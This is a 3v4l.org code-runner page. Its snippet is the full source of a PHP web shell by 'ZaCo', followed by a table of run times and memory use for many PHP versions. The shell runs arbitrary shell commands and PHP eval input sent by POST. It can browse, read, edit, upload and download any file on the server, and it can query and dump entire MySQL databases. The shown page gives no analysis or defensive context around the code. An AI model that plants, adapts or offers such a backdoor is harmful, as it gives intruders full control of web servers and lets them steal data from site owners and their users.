3v4l.org

run code in 300+ PHP versions simultaneously
<? ########################################################## # Small PHP Web Shell by ZaCo (c) 2004-2006 # # +POST method # # +MySQL Client+Dumper for DB and tables # # +PHP eval in text format and html for phpinfo() example # # PREVED: sn0w, Zadoxlik, Rebz, SkvoznoY, PinkPanther # # For antichat.ru and cup.su friends usage # # Sites : Saldiri.Org # # Just for fun :) # ########################################################## error_reporting(E_ALL); @set_time_limit(0); function magic_q($s) { if(get_magic_quotes_gpc()) { $s=str_replace('\\\'','\'',$s); $s=str_replace('\\\\','\\',$s); $s=str_replace('\\"','"',$s); $s=str_replace('\\\0','\0',$s); } return $s; } function get_perms($fn) { $mode=fileperms($fn); $perms=''; $perms .= ($mode & 00400) ? 'r' : '-'; $perms .= ($mode & 00200) ? 'w' : '-'; $perms .= ($mode & 00100) ? 'x' : '-'; $perms .= ($mode & 00040) ? 'r' : '-'; $perms .= ($mode & 00020) ? 'w' : '-'; $perms .= ($mode & 00010) ? 'x' : '-'; $perms .= ($mode & 00004) ? 'r' : '-'; $perms .= ($mode & 00002) ? 'w' : '-'; $perms .= ($mode & 00001) ? 'x' : '-'; return $perms; } $head=<<<headka <html> <head> <title>Small Web Shell by ZaCo - Saldiri.Org</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> </head> <body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34> <style> textarea { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: Fixedsys bold; } input { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: 8pt Verdana; } </style> headka; $page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:''); $page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page; $winda=strpos(strtolower(php_uname()),'wind'); define('format',50); $pages='<center>###<a href=\''.basename(__FILE__).'\'>cmd</a>###<a href=\''.basename(__FILE__).'?mysql\'>mysql</a>###<a href=\''.basename(__FILE__).'?eval\'>eval</a>###</center>'.($winda===false?'id :'.`id`:''); switch($page) { case 'eval': { $eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:''; $eval_value=magic_q($eval_value); $action=isset($_POST['action'])?$_POST['action']:'eval'; if($action=='eval_in_html') @eval($eval_value); else { echo($head.$pages); ?> <hr> <form method=post> <textarea cols=120 rows=20 name='eval_value'><?@eval($eval_value);?></textarea> <input name='action' value='eval' type='submit'> <input name='action' value='eval_in_html' type='submit'> <input name='page' value='eval' type=hidden> </form> <hr> <? } break; } case 'cmd': { $cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):''; $work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd(); $action=isset($_POST['action'])?$_POST['action']:'cmd'; if(@is_dir($work_dir)) { @chdir($work_dir); $work_dir=getcwd(); if($work_dir=='')$work_dir='/'; else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/'; } else if(file_exists($work_dir))$work_dir=realpath($work_dir); $work_dir=str_replace('\\','/',$work_dir); $e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES); switch($action) { case 'cmd' : { echo($head.$pages); ?> <form method='post' name='main_form'> <input name='work_dir' value='<?=$e_work_dir?>' type=text size=120> <input name='page' value='cmd' type=hidden> <input type=submit value='go'> </form> <form method=post> <input name='cmd' type=text size=120 value='<?=str_replace('\'','&#039;',$cmd)?>'> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post enctype="multipart/form-data"> <input type="file" name="filename"> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post> <input name='fname' type=text size=120><br> <input name='archive' type=radio value='none'>without arch <input name='archive' type=radio value='gzip' checked=true>gzip archive <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <pre> <? if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(`$cmd`)."\n</textarea>");} else { $f_action=isset($_POST['f_action'])?$_POST['f_action']:'view'; if(@is_dir($work_dir)) { echo('<strong>Listing '.$e_work_dir.'</strong><hr>'); $handle=@opendir($work_dir); if($handle) { while(false!==($fn=readdir($handle))){$files[]=$fn;}; @closedir($handle); sort($files); $not_dirs=array(); for($i=0;$i<sizeof($files);$i++) { $fn=$files[$i]; if(is_dir($fn)) { echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','&quot;',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn))); if($winda===false) { $owner=@posix_getpwuid(@fileowner($work_dir.$fn)); $group=@posix_getgrgid(@filegroup($work_dir.$fn)); printf("% 20s|% -20s",$owner['name'],$group['name']); } echo(@get_perms($work_dir.$fn).str_repeat(' ',10)); printf("% 20s ",@filesize($work_dir.$fn).'B'); printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n"); } else {$not_dirs[]=$fn;} } for($i=0;$i<sizeof($not_dirs);$i++) { $fn=$not_dirs[$i]; echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','&quot;',$fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn))); if($winda===false) { $owner=@posix_getpwuid(@fileowner($work_dir.$fn)); $group=@posix_getgrgid(@filegroup($work_dir.$fn)); printf("% 20s|% -20s",$owner['name'],$group['name']); } echo(@get_perms($work_dir.$fn).str_repeat(' ',10)); printf("% 20s ",@filesize($work_dir.$fn).'B'); printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n"); } echo('</pre><hr>'); ?> <form name='list' method=post> <input name='work_dir' type=hidden size=120><br> <input name='page' value='cmd' type=hidden> <input name='f_action' value='view' type=hidden> </form> <? } else echo('Error Listing '.$e_work_dir); } else switch($f_action) { case 'view': { echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n"); $f=@fopen($work_dir,'r'); ?> <form method=post> <textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea> <input name='page' value='cmd' type=hidden> <input name='work_dir' type=hidden value='<?=$e_work_dir?>' size=120> <input name='f_action' value='save' type=submit> </form> <? break; } case 'save' : { $file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):''; $f=@fopen($work_dir,'w'); if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n"); else { fwrite($f,$file_text); fclose($f); echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n"); } break; } } break; } break; } case 'upload' : { if($work_dir=='')$work_dir='/'; else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/'; $f=$_FILES["filename"]["name"]; if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed'); else { echo('file is uploaded in '.$e_work_dir); } break; } case 'download' : { $fname=isset($_POST['fname'])?$_POST['fname']:''; $temp_file=isset($_POST['temp_file'])?'on':'nn'; $f=@fopen($fname,'r'); if(!($f)) echo('file is not exists'); else { $archive=isset($_POST['archive'])?$_POST['archive']:''; if($archive=='gzip') { Header("Content-Type:application/x-gzip\n"); $s=gzencode(fread($f,filesize($fname))); Header('Content-Length: '.strlen($s)."\n"); Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n"); echo($s); } else { Header("Content-Type:application/octet-stream\n"); Header('Content-Length: '.filesize($fname)."\n"); Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n"); ob_start(); while(feof($f)===false) { echo(fread($f,10000)); ob_flush(); } } } } } break; } case 'mysql' : { $action=isset($_POST['action'])?$_POST['action']:'query'; $user=isset($_POST['user'])?$_POST['user']:''; $passwd=isset($_POST['passwd'])?$_POST['passwd']:''; $db=isset($_POST['db'])?$_POST['db']:''; $host=isset($_POST['host'])?$_POST['host']:'localhost'; $query=isset($_POST['query'])?magic_q($_POST['query']):''; switch($action) { case 'dump' : { $mysql_link=@mysql_connect($host,$user,$passwd); if(!($mysql_link)) echo('Connect error'); else { //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols $to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false; $archive=isset($_POST['archive'])?$_POST['archive']:'none'; if($archive!=='none')$to_file=false; $db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:''; $table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:''; if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error'); else { $dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n"; ob_start(); if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false; if($table_dump=='') { if(!$to_file) { header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); } $result=mysql_query('show tables',$mysql_link); for($i=0;$i<mysql_num_rows($result);$i++) { $rows=mysql_fetch_array($result); $result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link); if(!$result2)$dump_file.='#error table '.$rows[0]; else { $dump_file.='create table `'.$rows[0]."`(\n"; for($j=0;$j<mysql_num_rows($result2)-1;$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n"; } $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n"; $type[$j]=$rows2[1]; $dump_file.=");\n"; mysql_free_result($result2); $result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link); $columns=$j-1; for($j=0;$j<mysql_num_rows($result2);$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='insert into `'.$rows[0].'` values ('; for($k=0;$k<$columns;$k++) { $dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\','; } $dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n"; if($archive=='none') { if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);} else { echo($dump_file); ob_flush(); } $dump_file=''; } } mysql_free_result($result2); } } mysql_free_result($result); if($archive!='none') { $dump_file=gzencode($dump_file); header('Content-Length: '.strlen($dump_file)."\n"); echo($dump_file); } else if($t_f) { fclose($t_f); echo('Dump for '.$db_dump.' now in '.$to_file); } } else { $result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link); if(!$result2)echo('error table '.$table_dump); else { if(!$to_file) { header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); } if($to_file===false) { header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); } $dump_file.="create table `{$table_dump}`(\n"; for($j=0;$j<mysql_num_rows($result2)-1;$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n"; } $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n"; $type[$j]=$rows2[1]; $dump_file.=");\n"; mysql_free_result($result2); $result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link); $columns=$j-1; for($j=0;$j<mysql_num_rows($result2);$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='insert into `'.$table_dump.'` values ('; for($k=0;$k<$columns;$k++) { $dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\','; } $dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n"; if($archive=='none') { if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);} else { echo($dump_file); ob_flush(); } $dump_file=''; } } mysql_free_result($result2); if($archive!='none') { $dump_file=gzencode($dump_file); header('Content-Length: '.strlen($dump_file)."\n"); echo $dump_file; }else if($t_f) { fclose($t_f); echo('Dump for '.$db_dump.' now in '.$to_file); } } } } } break; } case 'query' : { echo($head.$pages); ?> <hr> <form method=post> <table> <td> <table align=left> <tr><td>User :<input name='user' type=text value='<?=$user?>'></td><td>Passwd :<input name='passwd' type=text value='<?=$passwd?>'></td><td>Host :<input name='host' type=text value='<?=$host?>'></td><td>DB :<input name='db' type=text value='<?=$db?>'></td></tr> <tr><textarea name='query' cols=120 rows=20><?=htmlspecialchars($query)?></textarea></tr> </table> </td> <td> <table> <tr><td>DB :</td><td><input type=text name='db_dump' value='<?=$db?>'></td></tr> <tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr> <input name='archive' type=radio value='none'>without arch <input name='archive' type=radio value='gzip' checked=true>gzip archive <tr><td><input type=submit name='action' value='dump'></td></tr> <tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr> </table> </td> </table> <input name='page' value='mysql' type=hidden> <input name='action' value='query' type=submit> </form> <hr> <? $mysql_link=@mysql_connect($host,$user,$passwd); if(!($mysql_link)) echo('Connect error'); else { if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;} //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols $result=@mysql_query($query,$mysql_link); if(!($result))echo(mysql_error()); else { echo("<table valign=top align=left>\n<tr>"); for($i=0;$i<mysql_num_fields($result);$i++) echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b> </td>'); echo("\n</tr>\n"); for($i=0;$i<mysql_num_rows($result);$i++) { $rows=mysql_fetch_array($result); echo('<tr valign=top align=left>'); for($j=0;$j<mysql_num_fields($result);$j++) { echo('<td>'.(htmlspecialchars($rows[$j])).'</td>'); } echo("</tr>\n"); } echo("</table>\n"); } mysql_close($mysql_link); } break; } } break; } } ?>

Here you find the average performance (time & memory) of each version. A grayed out version indicates it didn't complete successfully (based on exit-code).

VersionSystem time (s)User time (s)Memory (MiB)
8.3.60.0080.00816.75
8.3.50.0110.00722.88
8.3.40.0000.01518.97
8.3.30.0070.00718.92
8.3.20.0080.00020.21
8.3.10.0040.00423.66
8.3.00.0030.00519.38
8.2.180.0120.00318.41
8.2.170.0040.01122.96
8.2.160.0090.00620.42
8.2.150.0050.00324.18
8.2.140.0050.00324.66
8.2.130.0040.00426.16
8.2.120.0040.00420.98
8.2.110.0030.01422.08
8.2.100.0130.00417.91
8.2.90.0080.00019.05
8.2.80.0000.00917.97
8.2.70.0030.00717.50
8.2.60.0040.00417.88
8.2.50.0030.00618.10
8.2.40.0000.00718.22
8.2.30.0000.00718.09
8.2.20.0040.00417.79
8.2.10.0040.00417.92
8.2.00.0040.00417.71
8.1.280.0070.01425.92
8.1.270.0060.00323.92
8.1.260.0080.00026.35
8.1.250.0000.00728.09
8.1.240.0070.01423.86
8.1.230.0000.01122.20
8.1.220.0000.00817.74
8.1.210.0000.00918.77
8.1.200.0030.00617.10
8.1.190.0000.00816.98
8.1.180.0040.00418.10
8.1.170.0030.00718.43
8.1.160.0000.00721.95
8.1.150.0040.00418.81
8.1.140.0000.00717.25
8.1.130.0030.00317.81
8.1.120.0000.00717.27
8.1.110.0040.00417.39
8.1.100.0040.00417.42
8.1.90.0000.00717.27
8.1.80.0000.00817.37
8.1.70.0070.00017.37
8.1.60.0000.00817.43
8.1.50.0050.00317.48
8.1.40.0080.00017.31
8.1.30.0000.00817.39
8.1.20.0040.00417.52
8.1.10.0080.00017.47
8.1.00.0000.00817.38
8.0.300.0040.00418.77
8.0.290.0040.00416.75
8.0.280.0040.00418.53
8.0.270.0000.00717.25
8.0.260.0030.00317.12
8.0.250.0070.00017.04
8.0.240.0040.00417.05
8.0.230.0030.00316.93
8.0.220.0040.00416.95
8.0.210.0070.00016.85
8.0.200.0030.00316.82
8.0.190.0040.00416.95
8.0.180.0000.00716.91
8.0.170.0020.00516.77
8.0.160.0050.00216.99
8.0.150.0040.00416.67
8.0.140.0040.00416.87
8.0.130.0030.00313.46
8.0.120.0040.00416.81
8.0.110.0040.00416.86
8.0.100.0050.00316.84
8.0.90.0040.00416.91
8.0.80.0030.01316.80
8.0.70.0040.00416.93
8.0.60.0000.00716.87
8.0.50.0020.00516.71
8.0.30.0050.01417.13
8.0.20.0110.00917.40
8.0.10.0040.00416.79
8.0.00.0130.00516.85
7.4.330.0060.00015.30
7.4.320.0030.00316.50
7.4.300.0030.00316.53
7.4.290.0000.00716.43
7.4.280.0070.00016.47
7.4.270.0030.00616.54
7.4.260.0050.00216.45
7.4.250.0080.00016.51
7.4.240.0050.00316.38
7.4.230.0000.00716.50
7.4.220.0100.00816.37
7.4.210.0040.01616.56
7.4.200.0000.00816.55
7.4.160.0130.00316.53
7.4.150.0100.01317.40
7.4.140.0060.01217.86
7.4.130.0080.01216.50
7.4.120.0080.00916.60
7.4.110.0130.00516.31
7.4.100.0110.00816.50
7.4.90.0140.00416.56
7.4.80.0100.01019.39
7.4.70.0070.01116.46
7.4.60.0110.00616.40
7.4.50.0000.00816.56
7.4.40.0110.00616.44
7.4.30.0060.00916.42
7.4.10.0070.01015.08
7.4.00.0090.00715.00
7.3.330.0020.00513.79
7.3.320.0030.00313.78
7.3.310.0000.00716.37
7.3.300.0030.00316.32
7.3.290.0060.00916.26
7.3.280.0080.01016.25
7.3.270.0110.01217.40
7.3.260.0110.00716.38
7.3.250.0110.00916.35
7.3.240.0080.00816.61
7.3.230.0150.00316.53
7.3.210.0160.00316.48
7.3.200.0070.01019.39
7.3.190.0110.00616.42
7.3.180.0060.00916.21
7.3.170.0080.00816.49
7.3.160.0100.00616.42
7.3.130.0110.00714.74
7.3.120.0080.00914.82
7.3.110.0070.01114.65
7.3.100.0000.01415.02
7.3.90.0030.01414.83
7.3.80.0000.01014.93
7.3.70.0030.00614.88
7.3.60.0140.00014.89
7.3.50.0000.01614.87
7.3.40.0070.00714.93
7.3.30.0080.00414.74
7.3.20.0030.01016.80
7.3.10.0040.01016.54
7.3.00.0080.00816.74
7.2.330.0090.00916.52
7.2.320.0000.01716.41
7.2.310.0110.00716.68
7.2.300.0140.00716.46
7.2.290.0000.01616.58
7.2.260.0030.01515.11
7.2.250.0060.01214.88
7.2.240.0090.00914.96
7.2.230.0050.00514.77
7.2.220.0040.01115.12
7.2.210.0060.00614.95
7.2.200.0030.01214.90
7.2.190.0040.00414.94
7.2.180.0040.01215.03
7.2.170.0030.01014.93
7.2.160.0030.01315.07
7.2.150.0000.01516.70
7.2.140.0060.00616.84
7.2.130.0100.00716.87
7.2.120.0090.00517.04
7.2.110.0120.00616.70
7.2.100.0080.00516.84
7.2.90.0090.00916.79
7.2.80.0080.01016.91
7.2.70.0020.01116.96
7.2.60.0100.00717.02
7.2.50.0090.01016.91
7.2.40.0060.00817.04
7.2.30.0060.00917.00
7.2.20.0060.01017.05
7.2.10.0110.00516.77
7.2.00.0070.00817.50
7.1.330.0100.00315.71
7.1.320.0030.00715.62
7.1.310.0100.00315.51
7.1.300.0030.01015.53
7.1.290.0030.01015.79
7.1.280.0100.00015.74
7.1.270.0080.00815.78
7.1.260.0040.00415.82
7.1.250.0090.00515.73
7.1.240.0090.00615.84
7.1.230.0070.00715.86
7.1.220.0050.00415.69
7.1.210.0080.00615.72
7.1.200.0030.01415.61
7.1.190.0000.01315.78
7.1.180.0000.01315.64
7.1.170.0060.01015.81
7.1.160.0070.01015.96
7.1.150.0080.00815.66
7.1.140.0070.00715.55
7.1.130.0100.00715.47
7.1.120.0110.00415.86
7.1.110.0070.00415.73
7.1.100.0490.01017.06
7.1.90.0030.01315.67
7.1.80.0040.00915.90
7.1.70.0040.00516.60
7.1.60.0070.01217.59
7.1.50.0130.00916.48
7.1.40.0060.00915.98
7.1.30.0040.00715.78
7.1.20.0060.00315.69
7.1.10.0060.01215.72
7.1.00.0050.03819.07
7.0.330.0030.00915.30
7.0.320.0070.00715.61
7.0.310.0000.00815.58
7.0.300.0090.00915.41
7.0.290.0110.00315.42
7.0.280.0030.01015.46
7.0.270.0030.01415.34
7.0.260.0030.01115.36
7.0.250.0050.00515.50
7.0.240.0000.01415.19
7.0.230.0090.00315.16
7.0.220.0030.00615.48
7.0.210.0060.00315.52
7.0.200.0200.00515.98
7.0.190.0070.00715.31
7.0.180.0040.00415.57
7.0.170.0000.00915.21
7.0.160.0000.00915.62
7.0.150.0040.00415.53
7.0.140.0120.03518.79
7.0.130.0000.01015.43
7.0.120.0150.00015.46
7.0.110.0070.01015.28
7.0.100.0140.02317.95
7.0.90.0080.04217.92
7.0.80.0090.03917.89
7.0.70.0100.03817.79
7.0.60.0050.04317.74
7.0.50.0080.04018.14
7.0.40.0090.04216.68
7.0.30.0080.04616.64
7.0.20.0140.02616.80
7.0.10.0070.04816.86
7.0.00.0040.03916.76
5.6.400.0120.00314.00
5.6.390.0070.00714.16
5.6.380.0070.01014.34
5.6.370.0090.00614.22
5.6.360.0030.01514.57
5.6.350.0040.01214.24
5.6.340.0000.01014.45
5.6.330.0040.01114.16
5.6.320.0090.00314.13
5.6.310.0030.01014.28
5.6.300.0090.00613.88
5.6.290.0060.00614.26
5.6.280.0080.03817.73
5.6.270.0110.00714.31
5.6.260.0030.01414.48
5.6.250.0030.03817.63
5.6.240.0080.04117.53
5.6.230.0100.04017.50
5.6.220.0080.04317.55
5.6.210.0070.04517.63
5.6.200.0070.03317.65
5.6.190.0080.04117.74
5.6.180.0110.04217.80
5.6.170.0050.02917.88
5.6.160.0070.04617.72
5.6.150.0100.04117.95
5.6.140.0080.04717.80
5.6.130.0050.03517.87
5.6.120.0030.04817.73
5.6.110.0110.03617.80
5.6.100.0050.05017.87
5.6.90.0070.04017.66
5.6.80.0070.04117.48
5.6.70.0060.04017.34
5.6.60.0080.03817.34
5.6.50.0080.04617.34
5.6.40.0080.03817.45
5.6.30.0080.04317.32
5.6.20.0040.04017.28
5.6.10.0070.04517.34
5.6.00.0060.04117.40
5.5.380.0050.03917.57
5.5.370.0080.04217.18
5.5.360.0130.03817.23
5.5.350.0120.04217.36
5.5.340.0080.04517.67
5.5.330.0080.04317.68
5.5.320.0080.04317.62
5.5.310.0080.04217.62
5.5.300.0050.04517.57
5.5.290.0090.04017.62
5.5.280.0030.04917.50
5.5.270.0100.04017.37
5.5.260.0020.03717.61
5.5.250.0030.04417.44
5.5.240.0080.04017.21
5.5.230.0070.04417.14
5.5.220.0080.03817.28
5.5.210.0070.02517.37
5.5.200.0060.03717.21
5.5.190.0130.03617.26
5.5.180.0090.04517.22
5.5.170.0060.00613.98
5.5.160.0050.04217.30
5.5.150.0050.04817.18
5.5.140.0120.04217.29
5.5.130.0050.04317.34
5.5.120.0050.04117.09
5.5.110.0080.03617.06
5.5.100.0050.04017.11
5.5.90.0080.03817.18
5.5.80.0000.04817.03
5.5.70.0050.03717.00
5.5.60.0050.04217.05
5.5.50.0080.04217.04
5.5.40.0070.04217.17
5.5.30.0030.04417.30
5.5.20.0120.04117.10
5.5.10.0050.04517.10
5.5.00.0110.04217.17
5.4.450.0100.04615.68
5.4.440.0130.04015.65
5.4.430.0070.04415.63
5.4.420.0050.04915.68
5.4.410.0090.04415.53
5.4.400.0030.02515.41
5.4.390.0080.02415.48
5.4.380.0030.02915.51
5.4.370.0080.04015.38
5.4.360.0030.04515.48
5.4.350.0100.04315.43
5.4.340.0120.04015.51
5.4.330.0030.00911.81
5.4.320.0070.04215.38
5.4.310.0080.04115.42
5.4.300.0070.04715.45
5.4.290.0030.03015.43
5.4.280.0050.02815.56
5.4.270.0050.04015.36
5.4.260.0100.04315.41
5.4.250.0080.03815.42
5.4.240.0060.04415.41
5.4.230.0100.03715.56
5.4.220.0020.04615.55
5.4.210.0130.03515.49
5.4.200.0050.03915.52
5.4.190.0100.02015.54
5.4.180.0070.04015.43
5.4.170.0020.03215.43
5.4.160.0060.03915.31
5.4.150.0080.04215.51
5.4.140.0080.04014.20
5.4.130.0130.03514.10
5.4.120.0100.03814.10
5.4.110.0080.04214.19
5.4.100.0090.03614.09
5.4.90.0070.03414.16
5.4.80.0090.02314.19
5.4.70.0130.03214.18
5.4.60.0020.04214.29
5.4.50.0050.03814.12
5.4.40.0050.03914.19
5.4.30.0030.04214.10
5.4.20.0060.04014.27
5.4.10.0100.02514.10
5.4.00.0070.04113.92

preferences:
46.16 ms | 401 KiB | 5 Q